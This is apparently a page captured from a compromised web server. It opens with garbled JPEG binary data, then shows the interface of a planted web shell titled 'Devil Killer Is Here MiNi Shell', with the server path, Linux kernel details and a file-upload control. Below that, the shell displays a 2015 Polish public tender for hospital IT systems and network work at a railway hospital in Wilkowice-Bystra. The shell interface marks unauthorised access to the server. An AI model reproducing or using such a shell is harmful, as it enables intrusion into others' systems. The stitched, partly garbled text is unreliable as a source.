JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150207/27792-N-2015.html

<p class="kh_header"><b>Wilkowice: Poprawa jakości usług medycznych i zarządzania poprzez realizację i wdrożenie zintegrowanego systemu informatycznego w Szpitalu Kolejowym w Wilkowicach-Bystrej</b><br>
<b>Numer ogłoszenia: 27792 - 2015; data zamieszczenia: 07.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> SPZOZ Szpital Kolejowy w Wilkowicach-Bystrej , ul. Żywiecka 19, 43-365 Wilkowice, woj. śląskie, tel. 33 8122020 w. 131, faks 33 8123098.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-kolejowy.com</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Poprawa jakości usług medycznych i zarządzania poprzez realizację i wdrożenie zintegrowanego systemu informatycznego w Szpitalu Kolejowym w Wilkowicach-Bystrej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia jest podzielony na dwie części:
a)	Część I - zakup i instalacja sprzętu komputerowego, sieciowego wraz z oprogramowaniem oraz zakup i wdrożenie systemów front-office i back-office
b)	Część II - budowa  sieci LAN, zasilania dedykowanego oraz serwerowni.

Zakres przedmiotu zamówienia dla Części I obejmuje dostawę i instalację sprzętu komputerowego, sieciowego wraz z oprogramowaniem:
1.	Zestawy komputerowe z monitorem i licencjami dostępowymi  	59 szt
2.	Zestaw komputerowy z monitorem i licencją dostępową  typ 2 	1 szt
3.	Monitor  typ 2 ( koszt niekwalifikowany)				        1 szt
4.	Serwer bazodanowy z systemem operacyjnym				   1 szt
5.	Serwer usługowy aplikacji z systemem operacyjnym			   1 szt
6.	Oprogramowanie antywirusowe					60 szt
7.	System archiwizacji danych z systemem operacyjnym  i  macierzą dyskową 	1  kpl
8.	Przełącznik sieciowy typ 1			                          	6 szt
9.	Przełącznik sieciowy typ 2					2 szt
10.	Zasilacz UPS do serwerów					2 szt
11.	Zasilacz UPS punktu dystrybucyjnego				1 szt
12.	Firewall						1 szt
13.	Kontroler sieci bezprzewodowej					1 szt
14.	Punkt dostępowy 						25 szt 
15.	zakup i wdrożenie systemów front-office i back-office jako: 
a)	Moduł Izba przyjęć
b)	Moduł Zlecenia
c)	Moduł Apteka i Apteczka Oddziałowa 
d)	Moduł Rozliczenia z NFZ i statystyki 
e)	Moduł Recepcja
f)	Moduł Laboratorium
g)	Moduł Rehabilitacja
h)	Moduł Pracownie diagnostyczne
i)	Moduł Punkt pobrań
j)	Moduł Administracja
k)	Moduł Dokumentacja medyczna
l)	Moduł Elektroniczna dokumentacja medyczna z funkcją e-pacjenta i e-kontrahenta
m)	System finansowo-księgowy w składzie 
a)	Rejestr sprzedaży
b)	Kasa
c)	Kalkulacja kosztów leczenia
d)	Środki trwałe
e)	Wyposażenie

Zakres przedmiotu zamówienia dla Części II obejmuje:
1.	modernizacje i rozbudowę sieci wewnętrznej LAN i WiFi
2.	modernizacje i rozbudowę sieci zasilania dedykowanego (koszt niekwalifikowany)
3.	modernizacje i wyposażenie pomieszczenia serwerowni..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.26.30.00-6, 48.26.00.00-0, 48.61.00.00-0, 48.82.00.00-0, 30.20.00.00-0, 45.31.43.00-0, 45.31.00.00-0, 45.31.43.20-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga złożenia wadium w wysokości: 
a) Dla części I: 30.000 zł   słownie: trzydzieści tysięcy złotych
b) Dla części II: 7.000 zł    słownie: siedem tysięcy złotych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dot. części I i II 
O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 Ustawy prawo zamówień publicznych - warunek zostanie uznany za spełniony jeżeli Wykonawca złoży:a)	oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy Prawo zamówień publicznych - sporządzone wg załącznika nr 3 do niniejszej specyfikacji. 
b)	aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy PZP, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - jeśli dotyczy, 
c)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
d)	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
e)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
f)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
g)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10-11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
h)	lista podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Prawo zamówień publicznych albo informacja, że wykonawca nie należy do grupy kapitałowej - sporządzone wg załącznika nr 4 do niniejszej specyfikacji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Części I
posiadają wiedzę i doświadczenie niezbędne do wykonania przedmiotu zamówienia tj. udokumentują wykonanie, tj. zakończenie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 1 zamówienia polegającego na dostawie z konfiguracją i montażem sprzętu komputerowego o  wartości brutto minimum 200 000,00 zł brutto (słownie: dwieście tysięcy złotych)  oraz załączeniem dowodu, że została wykonana należycie oraz posiadają wiedzę i doświadczenie niezbędne do wykonania przedmiotu zamówienia tj. udokumentują wykonanie, tj. zakończenie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 1 zamówienia polegającego na dostawie i wdrożeniu systemów medycznych o wartości brutto minimum 500.000,00 zł (słownie: pięćset tysięcy złotych), oraz załączeniem dowodu, że została wykonana należycie.
Dla Części II posiadają wiedzę i doświadczenie niezbędne do wykonania przedmiotu zamówienia tj. udokumentują wykonanie, tj. zakończenie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 1 zamówienia polegającego na modernizacji okablowania LAN i zasilania dedykowanego, budowy serwerowni o wartości brutto minimum 200.000,00 zł (słownie: dwieście tysięcy złotych), oraz załączeniem dowodu, że została wykonana należycie.
Warunek zostanie uznany za spełniony jeżeli Wykonawca złoży a)	wykaz wykonanych głównych usług określonych odpowiednio:
- w punkcie 5.2.a. i 5.3.a dla części I SIWZ - sporządzony przez wykonawcę według załącznika nr 5a do SIWZ oraz 
- w punkcie 5.2.b dla części II SIWZ - sporządzony przez wykonawcę według załącznika nr 5b do SIWZ. 
Wykaz musi zawierać wszystkie dane wyszczególnione odpowiednio w załączniku nr 5a i 5b do SIWZ w szczególności dot. przedmiotu, dat wykonania, podmiotów na rzecz których usługa była wykonywana, wartości usługi.
b)	Dowody dotyczące usług wymienionych w ww. wykazie określające czy usługi zostały wykonane należycie, tzn.:
- poświadczenie albo
- oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
Dowody, o których mowa powyżej, są wskazane w § 1 ust. 2 pkt 1 i 3  Rozporządzenia Prezesa Rady Ministrów z dnia 19.02.2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z dnia 19.02.2013 r., poz. 231).
W przypadku, gdy zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, o którym mowa w punkcie 6.2.a., zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej. 
c)	w sytuacji, gdy Wykonawca polega na wiedzy i doświadczeniu niezbędnym do wykonania zamówienia innych podmiotów, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia - należy dołączyć oryginał zobowiązania - jeśli dotyczy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dot. części I
O zamówienie publiczne mogą ubiegać się Wykonawcy,
którzy spełniają następujące warunki:
1. posiadają wiedzę i doświadczenie niezbędne do
wykonania przedmiotu zamówienia tj. udokumentują
wykonanie, tj. zakończenie w okresie ostatnich trzech
lat przed upływem terminu składania ofert, a jeżeli
okres prowadzenia działalności jest krótszy - w tym
okresie - co najmniej 1 zamówienia polegającego
na dostawie z konfiguracją i montażem sprzętu
komputerowego o wartości brutto minimum 200 000,00
zł brutto (słownie: dwieście tysięcy złotych) oraz
załączeniem dowodu, że została wykonana należycie.
2 posiadają wiedzę i doświadczenie niezbędne do
wykonania przedmiotu zamówienia tj. udokumentują
wykonanie, tj. zakończenie w okresie ostatnich trzech
Minimalny poziom ewentualnie wymaganych
standardów: (jeżeli dotyczy)
_____
PL Formularz standardowy 02 - Ogłoszenie o zamówieniu 9 / 23
lat przed upływem terminu składania ofert, a jeżeli
okres prowadzenia działalności jest krótszy - w tym
okresie - co najmniej 1 zamówienia polegającego
na dostawie i wdrożeniu systemów medycznych o
wartości brutto minimum 500.000,00 zł (słownie: pięćset
tysięcy złotych), oraz załączeniem dowodu, że została
wykonana należycie.
3. dysponują osobami zdolnymi do wykonania
zamówienia, które będą uczestniczyć w wykonywaniu
zamówienia, tj.:
- 1 osobą, która pełnić będzie rolę kierownika
projektu, certyfikat zawodowy z zakresu zarządzania
projektami PRINCE2 lub równoważny, wydany
przez niezależną jednostkę akredytowaną do
wydawania tego typu certyfikatów. Osoba ta musi mieć
doświadczenie w zarządzaniu projektami w zakresie
wdrażania zintegrowanych systemów informatycznych
wspomagających zarządzanie jednostką sektora
finansów publicznych, potwierdzone udziałem w co
najmniej jednym takim projekcie.
- 1 osobą pełniącą funkcję Specjalisty ds.
bezpieczeństwa informacji, posiadającą certyfikat
Audytora Systemu Zarządzania Bezpieczeństwem
Informacji (min. ISO 27001 lub równoważnym)
- 3 specjalistami, posiadającymi certyfikat zawodowy
z zakresu wdrażania oprogramowania. Proponowani
specjaliści muszą posiadać doświadczenie w
zakresie wdrażania zintegrowanych systemów
wspomagających zarządzanie pracą jednostki
sektora finansów publicznych, potwierdzone udziałem
proponowanych specjalistów, w co najmniej jednym
projekcie dotyczącym wdrożenia oprogramowania w
jednostce sektora finansów publicznych.
Obywatelom państw członkowskich Unii Europejskiej,
których kwalifikacje zostały uznane, zapewnia się
prawo wykonywania w Rzeczypospolitej Polskiej
działalności na takich samych zasadach jak osobom,
które kwalifikacje do ich wykonywania uzyskały w
Rzeczypospolitej Polskiej. Regulację w tym zakresie
stanowią przepisy ustawy z dnia 18 marca 2008 r. o
zasadach uznawania kwalifikacji zawodowych nabytych
w państwach członkowskich Unii Europejskiej (tekst
jedn. Dz. U. z 2008, Nr 63, poz. 394 ze zm.).
Dokumentami potwierdzającymi spełnianie warunku, o
którym mowa w punkcie 1 i 2 muszą być:
a) wykaz wykonanych głównych usług określonych
odpowiednio w punkcie 1 i 2 dla części I - sporządzony
przez wykonawcę według załącznika nr 5a do
specyfikacji. Wykaz musi zawierać wszystkie dane
wyszczególnione odpowiednio w załączniku nr 5a
do specyfikacji w szczególności dot. przedmiotu, dat
wykonania, podmiotów na rzecz których usługa była
wykonywana, wartości usługi.
b) Dowody dotyczące usług wymienionych w ww.
wykazie określające czy usługi zostały wykonane
należycie, tzn.:
PL Formularz standardowy 02 - Ogłoszenie o zamówieniu 10 / 23
- poświadczenie albo
- oświadczenie wykonawcy - jeżeli z uzasadnionych
przyczyn o obiektywnym charakterze wykonawca nie
jest w stanie uzyskać poświadczenia, o którym mowa
powyżej.
Dowody, o których mowa powyżej, są wskazane w § 1
ust. 2 pkt 1 i 3 Rozporządzenia Prezesa Rady Ministrów
z dnia 19.02.2013 r. w sprawie rodzajów dokumentów,
jakich może żądać zamawiający od wykonawcy, oraz
form, w jakich te dokumenty mogą być składane (Dz. U.
z dnia 19.02.2013 r., poz. 231).
W przypadku, gdy zamawiający jest podmiotem, na
rzecz którego usługi wskazane w wykazie, o którym
mowa w punkcie a), zostały wcześniej wykonane,
wykonawca nie ma obowiązku przedkładania dowodów,
o których mowa powyżej.
c) w sytuacji, gdy Wykonawca polega na wiedzy i
doświadczeniu niezbędnym do wykonania zamówienia
innych podmiotów, zobowiązany jest udowodnić
zamawiającemu, iż będzie dysponował tymi zasobami
w trakcie realizacji zamówienia, w szczególności
przedstawiając w tym celu pisemne zobowiązanie tych
podmiotów do oddania mu do dyspozycji niezbędnych
zasobów na potrzeby wykonania zamówienia - należy
dołączyć oryginał zobowiązania - jeśli dotyczy.
Dokumentami potwierdzającymi spełnianie warunku, o
którym mowa w punkcie 3 muszą być:
a) wykaz osób, którymi dysponuje Wykonawca,
które będą uczestniczyć w wykonywaniu przedmiotu
zamówienia o uprawnieniach określonych odpowiednio
w punkcie 3 - dotyczy części I - sporządzony wg
załącznika nr 6a do specyfikacji
Wykaz musi zawierać wszystkie dane wyszczególnione
odpowiednio w załączniku nr 6a do specyfikacji
w szczególności dot. kwalifikacji zawodowych
i doświadczenia, informacji o podstawie do
dysponowania osobami wskazanymi w wykazie.
b) Oświadczenie, że osoby, które będą uczestniczyć
w wykonywaniu zamówienia, posiadają wymagane
uprawnienia - zawarte w druku OFERTA.
c) w sytuacji, gdy Wykonawca polega na osobach
zdolnych do wykonania zamówieniu innych podmiotów,
zobowiązany jest udowodnić zamawiającemu, iż
będzie dysponował tymi zasobami w trakcie realizacji
zamówienia, w szczególności przedstawiając w tym
celu pisemne zobowiązanie tych podmiotów do oddania
mu do dyspozycji niezbędnych zasobów na potrzeby
wykonania zamówienia - należy dołączyć oryginał
zobowiązania - jeśli dotyczy.
dot. części II
O zamówienie publiczne mogą ubiegać się Wykonawcy,
którzy spełniają następujące warunki:
1. posiadają wiedzę i doświadczenie niezbędne do
wykonania przedmiotu zamówienia tj. udokumentują
wykonanie, tj. zakończenie w okresie ostatnich trzech
PL Formularz standardowy 02 - Ogłoszenie o zamówieniu 11 / 23
lat przed upływem terminu składania ofert, a jeżeli
okres prowadzenia działalności jest krótszy - w tym
okresie - co najmniej 1 zamówienia polegającego
na modernizacji okablowania LAN i zasilania
dedykowanego, budowy serwerowni o wartości
brutto minimum 200.000,00 zł (słownie: dwieście
tysięcy złotych), oraz załączeniem dowodu, że została
wykonana należycie.
Zamawiający dopuszcza możliwość spełnienia w/w
warunku udziału w postępowaniu w ramach dwóch
odrębnych usług tj. jednej na modernizację okablowania
LAN i zasilania dedykowanego oraz jednej na budowę
serwerowni o łącznej kwocie obu usług określonej w
warunku.
2. dysponują osobami zdolnymi do wykonania
zamówienia, które będą uczestniczyć w wykonywaniu
zamówienia, tj.:
- 1 osobą, która pełnić będzie funkcję kierownika
budowy, posiadającą uprawnienia do kierowania
robotami budowlanymi w specjalności instalacyjnej w
zakresie instalacji i urządzeń elektrycznych
- 1 osobą, posiadającą uprawnienia do prowadzenia
samodzielnych funkcji technicznych w budownictwie
w zakresie kierowania robotami budowlanymi w
specjalnościach instalacyjnych w telekomunikacji
Zamawiający dopuszcza połączenie funkcji
poszczególnych osób pod warunkiem spełnienia
przez osobę łączącą funkcje wszystkich warunków
wymaganych dla tych funkcji.
Kierownik budowy, powinien posiadać uprawnienia
budowlane zgodnie z ustawą z dnia 07 lipca 1994 r.
Prawo budowlane (tekst jednolity Dz. U. z 2013 r.,
poz. 1409 z późn. zm.) oraz rozporządzeniem Ministra
Transportu i Budownictwa z dnia 28 kwietnia 2006
r. w sprawie samodzielnych funkcji technicznych
w budownictwie (j.t. Dz. U. Nr 83, poz. 578 z późn.
zm.) lub odpowiadające im ważne uprawnienia
budowlane, które zostały wydane na podstawie
wcześniej obowiązujących przepisów.
Zgodnie z art. 12a ustawy Prawo budowlane
samodzielne funkcje techniczne w budownictwie,
określone w art. 12 ust. 1 ustawy mogą również
wykonywać osoby, których odpowiednie kwalifikacje
zawodowe zostały uznane na zasadach określonych
w przepisach odrębnych. Regulację odrębną stanowią
przepisy ustawy z dnia 18 marca 2008 r. o zasadach
uznawania kwalifikacji zawodowych nabytych w
państwach członkowskich Unii Europejskiej (tekst jedn.
Dz. U. z 2008, Nr 63, poz. 394 ze zm.).
Obywatelom państw członkowskich Unii Europejskiej,
których kwalifikacje zostały uznane, zapewnia się
prawo wykonywania w Rzeczypospolitej Polskiej
działalności na takich samych zasadach jak osobom,
które kwalifikacje do ich wykonywania uzyskały w
Rzeczypospolitej Polskiej.
PL Formularz standardowy 02 - Ogłoszenie o zamówieniu 12 / 23
Dokumentami potwierdzającymi spełnianie warunku, o
którym mowa w punkcie 1 muszą być:
a) wykaz wykonanych głównych usług określonych
odpowiednio w punkcie 1 dla części II - sporządzony
przez wykonawcę według załącznika nr 5b do
specyfikacji.
Wykaz musi zawierać wszystkie dane wyszczególnione
odpowiednio w załączniku nr 5b do specyfikacji
w szczególności dot. przedmiotu, dat wykonania,
podmiotów na rzecz których usługa była wykonywana,
wartości usługi.
b) Dowody dotyczące usług wymienionych w ww.
wykazie określające czy usługi zostały wykonane
należycie, tzn.:
- poświadczenie albo
- oświadczenie wykonawcy - jeżeli z uzasadnionych
przyczyn o obiektywnym charakterze wykonawca nie
jest w stanie uzyskać poświadczenia, o którym mowa
powyżej.
Dowody, o których mowa powyżej, są wskazane w § 1
ust. 2 pkt 1 i 3 Rozporządzenia Prezesa Rady Ministrów
z dnia 19.02.2013 r. w sprawie rodzajów dokumentów,
jakich może żądać zamawiający od wykonawcy, oraz
form, w jakich te dokumenty mogą być składane (Dz. U.
z dnia 19.02.2013 r., poz. 231).
W przypadku, gdy zamawiający jest podmiotem, na
rzecz którego usługi wskazane w wykazie, o którym
mowa w punkcie a., zostały wcześniej wykonane,
wykonawca nie ma obowiązku przedkładania dowodów,
o których mowa powyżej.
c) w sytuacji, gdy Wykonawca polega na wiedzy i
doświadczeniu niezbędnym do wykonania zamówienia
innych podmiotów, zobowiązany jest udowodnić
zamawiającemu, iż będzie dysponował tymi zasobami
w trakcie realizacji zamówienia, w szczególności
przedstawiając w tym celu pisemne zobowiązanie tych
podmiotów do oddania mu do dyspozycji niezbędnych
zasobów na potrzeby wykonania zamówienia - należy
dołączyć oryginał zobowiązania - jeśli dotyczy.
Dokumentami potwierdzającymi spełnianie warunku, o
którym mowa w punkcie 2 muszą być:
a) wykaz osób, którymi dysponuje Wykonawca,
które będą uczestniczyć w wykonywaniu przedmiotu
zamówienia o uprawnieniach określonych odpowiednio
w punkcie 2 - dotyczy części II - sporządzony wg
załącznika nr 6b do specyfikacji.
Wykaz musi zawierać wszystkie dane wyszczególnione
odpowiednio w załączniku nr 6b do niniejszej
specyfikacji w szczególności dot. kwalifikacji
zawodowych i doświadczenia, informacji o podstawie
do dysponowania osobami wskazanymi w wykazie.
b) Oświadczenie, że osoby, które będą uczestniczyć
w wykonywaniu zamówienia, posiadają wymagane
uprawnienia - zawarte w druku OFERTA.
PL Formularz standardowy 02 - Ogłoszenie o zamówieniu 13 / 23
c) w sytuacji, gdy Wykonawca polega na osobach
zdolnych do wykonania zamówieniu innych podmiotów,
zobowiązany jest udowodnić zamawiającemu, iż
będzie dysponował tymi zasobami w trakcie realizacji
zamówienia, w szczególności przedstawiając w tym
celu pisemne zobowiązanie tych podmiotów do oddania
mu do dyspozycji niezbędnych zasobów na potrzeby
wykonania zamówienia - należy dołączyć oryginał
zobowiązania - jeśli dotyczy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Części I 
dysponują osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia, tj.: 
 - 1 osobą, która pełnić będzie rolę kierownika projektu, certyfikat zawodowy z zakresu zarządzania projektami PRINCE2 lub równoważny, wydany przez niezależną jednostkę akredytowaną do wydawania tego typu certyfikatów. Osoba ta musi mieć doświadczenie w zarządzaniu projektami w zakresie wdrażania zintegrowanych systemów informatycznych wspomagających zarządzanie jednostką sektora finansów publicznych, potwierdzone udziałem w co najmniej jednym takim projekcie. 
- 1 osobą pełniącą funkcję Specjalisty ds. bezpieczeństwa informacji, posiadającą certyfikat Audytora Systemu Zarządzania Bezpieczeństwem Informacji (min. ISO 27001  lub równoważnym)
- 3 specjalistami, posiadającymi certyfikat zawodowy z zakresu wdrażania oprogramowania. Proponowani specjaliści muszą posiadać doświadczenie w zakresie wdrażania zintegrowanych systemów wspomagających zarządzanie pracą jednostki sektora finansów publicznych, potwierdzone udziałem proponowanych specjalistów, w co najmniej jednym projekcie dotyczącym wdrożenia oprogramowania w jednostce sektora finansów publicznych. 
